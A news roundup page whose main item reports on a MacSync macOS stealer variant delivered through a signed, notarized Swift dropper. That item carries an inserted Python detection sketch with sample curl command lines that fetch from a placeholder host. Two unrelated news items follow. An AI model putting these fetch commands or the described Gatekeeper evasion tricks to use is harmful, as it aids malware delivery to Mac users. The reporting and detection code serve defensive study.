Category: Uncategorized

  • New MacSync macOS Stealer Uses Signed App to Bypass Apple Gatekeeper



    Dec 24, 2025 | Ravie Lakshmanan | Malware / Endpoint Security


    Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that’s delivered by means of a digitally signed, notarized Swift application masquerading as a messaging app installer to bypass Apple’s Gatekeeper checks.

    “Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more deceptive, hands-off approach,” Jamf researcher Thijs Xhaflaire said.

    The Apple device management firm and security company said the latest version is distributed as a code-signed and notarized Swift application within a disk image (DMG) file named “zk-call-messenger-installer-3.9.2-lts.dmg” that’s hosted on “zkcall[.]net/download.”


    The fact that it’s signed and notarized means it can be run without being blocked or flagged by built-in security controls like Gatekeeper or XProtect. Despite this, the installer has been found to display instructions prompting users to right-click and open the app – a common tactic used to sidestep such safeguards. Apple has since revoked the code signing certificate.

    The Swift-based dropper then performs a series of checks before downloading and executing an encoded script through a helper component. These include verifying internet connectivity, enforcing a minimum execution interval of around 3600 seconds as a rate limit, removing quarantine attributes, and validating the file prior to execution.

    “Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” Xhaflaire explained. “Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like --noproxy have been introduced.”

    “These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection.”
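
An added detection sketch, not taken from Jamf's report or the original article: a rule keyed on the literal `-fsSL` substring misses the split `-fL -sS` form, so the Python below expands curl's short-flag clusters before matching and also reports `--noproxy`. The sample command lines, the placeholder host and the option tables (a subset of curl's options) are constructed assumptions.

```python
import shlex

# Subset of curl options that consume a value (assumption: not exhaustive).
SHORT_WITH_VALUE = set("oHdAeuxmXbcwKTE")
LONG_WITH_VALUE = {"--noproxy", "--output", "--header", "--data", "--user-agent",
                   "--proxy", "--max-time", "--connect-timeout", "--request", "--url"}
LONG_TO_SHORT = {"--fail": "f", "--silent": "s", "--show-error": "S", "--location": "L"}
QUIET_FOLLOW = set("fsSL")  # the effective flag set behind "-fsSL"


def effective_flags(cmdline):
    """Return (short_flags, long_flags) for a curl command line, else None."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    short, long_ = set(), set()
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and len(tok) > 2:
            long_.add(tok)
            if tok in LONG_TO_SHORT:
                short.add(LONG_TO_SHORT[tok])
            if tok in LONG_WITH_VALUE:
                i += 1  # skip the option's value
        elif tok.startswith("-") and len(tok) > 1 and tok != "--":
            for pos, ch in enumerate(tok[1:], start=1):
                short.add(ch)
                if ch in SHORT_WITH_VALUE:
                    if pos == len(tok) - 1:
                        i += 1  # value is the next token
                    break  # otherwise the rest of the cluster is the value
        i += 1
    return short, long_


def classify(cmdline):
    """Flag quiet, redirect-following fetches however the flags are split."""
    parsed = effective_flags(cmdline)
    if parsed is None:
        return None
    return {"quiet_follow": QUIET_FOLLOW <= parsed[0], "noproxy": "--noproxy" in parsed[1]}

# Constructed sample command lines; example.invalid is a placeholder host.
SAMPLES = [
    "curl -fsSL https://example.invalid/a",
    "/usr/bin/curl -fL -sS --noproxy '*' -o /tmp/x https://example.invalid/a",
    "curl -o fsSL.txt https://example.invalid/a",
]
```

The third sample shows why the option tables matter: `fsSL.txt` is the value of `-o`, not a flag cluster, so it is not flagged.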

    Another evasion mechanism used in the campaign is the use of an unusually large DMG file, inflating its size to 25.5 MB by embedding unrelated PDF documents.

    The Base64-encoded payload, once parsed, corresponds to MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync, per MacPaw’s Moonlock Lab, comes fitted with a fully-featured Go-based agent that goes beyond simple data theft and enables remote command and control capabilities.


    It’s worth noting that code-signed versions of malicious DMG files mimicking Google Meet have also been observed in attacks propagating other macOS stealers like Odyssey. That said, threat actors have continued to rely on unsigned disk images to deliver DigitStealer as recently as last month.

    “This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” Jamf said.




  • Officials discover a million more documents potentially related to Epstein case



    US authorities have discovered more than a million more documents potentially related to the late paedophile Jeffrey Epstein that they plan to release in the coming days and weeks, officials say.

    The US Attorney for the Southern District of New York and the FBI have informed the Department of Justice (DoJ) about the discovery and turned over the documents for lawyers to review.

    “We have lawyers working around the clock to review and make the legally required redactions to protect victims, and we will release the documents as soon as possible,” the DoJ said on social media on Wednesday.

    The department said that given the volume of material, the process could take “a few more weeks”.

    The agency said it would “continue to fully comply with federal law and President Trump’s direction to release the files”.

    The statement did not specify how the FBI and New York prosecutors came across the additional material.

    The news comes after the justice department released thousands of documents last week – some heavily redacted – related to their investigations into Epstein.

    The files were released after Congress passed the Epstein Files Transparency Act – signed into law by US President Donald Trump – that ordered the agency to share all the documents with the public while protecting victims’ identities.

    Many of the documents released last week had names and other information blacked out, including names of people who the FBI appears to cite as possible co-conspirators in the Epstein case.

    The justice department has faced criticism from lawmakers on both sides of the aisle over the amount of redactions in its files, which the law only permits in the case of protecting victims’ identities and active criminal investigations.




  • Algeria’s parliament approves law declaring France’s colonisation a crime



    Algeria’s parliament has unanimously passed a law declaring France’s colonisation of the North African state a crime, and demanding an apology and reparations.

    The law also criminalises the glorification of colonialism, state-run TV reports.

    The vote is the latest sign of increasingly strained diplomatic relations between the two countries, with some observers saying they are at their lowest since Algeria gained independence 63 years ago.

    France’s colonisation of Algeria between 1830 and 1962 was marked by mass killings and large-scale deportations, and ended in a bloody war of independence. Algeria says the war killed 1.5 million people, while French historians put the death toll much lower.

    France’s President Emmanuel Macron has previously acknowledged the colonisation of Algeria was a “crime against humanity” but has not offered an apology.

    Lawmakers wore scarves in the colours of the national flag and chanted “long live Algeria” as they applauded the bill’s passage through parliament, AFP news agency reports.

    It says the legislation states that France has “legal responsibility” for the “tragedies it caused”, and “full and fair” compensation was an “inalienable right of the Algerian state and people”.

    France has not yet commented on the vote.

    It comes at a time of growing pressure on Western powers to offer reparations for slavery and colonialism, and to return looted artefacts still kept in their museums.

    Algerian lawmakers have been demanding that France return a 16th Century bronze cannon, known as Baba Merzoug, meaning “Blessed Father”, that was regarded as the protector of Algiers, now Algeria’s capital.

    French forces captured the city in 1830, on their third attempt, and removed the cannon – which is now in the port city of Brest in north-western France.

    In 2020, France returned the remains of 24 Algerian fighters who were killed resisting French colonial forces in the 19th Century.

    Last month, Algeria hosted a conference of African states to push for justice and reparations.

    Algeria’s Foreign Minister Ahmed Attaf said that a legal framework would ensure that restitution was neither regarded as “a gift nor a favour”.

    Diplomatic relations between Algeria and France soured last year, when Macron announced France was recognising Moroccan sovereignty of Western Sahara and backed a plan for limited autonomy for the disputed territory.

    Algeria backs the pro-independence Polisario Front in Western Sahara and is seen as its main ally.

    French-Algerian novelist Boualem Sansal was then arrested at Algiers airport in and jailed for five years, before being pardoned by Algeria’s President Abdelmadjid Tebboune last month.

    Prosecutors said he had undermined national security for making remarks that questioned Algeria’s borders.


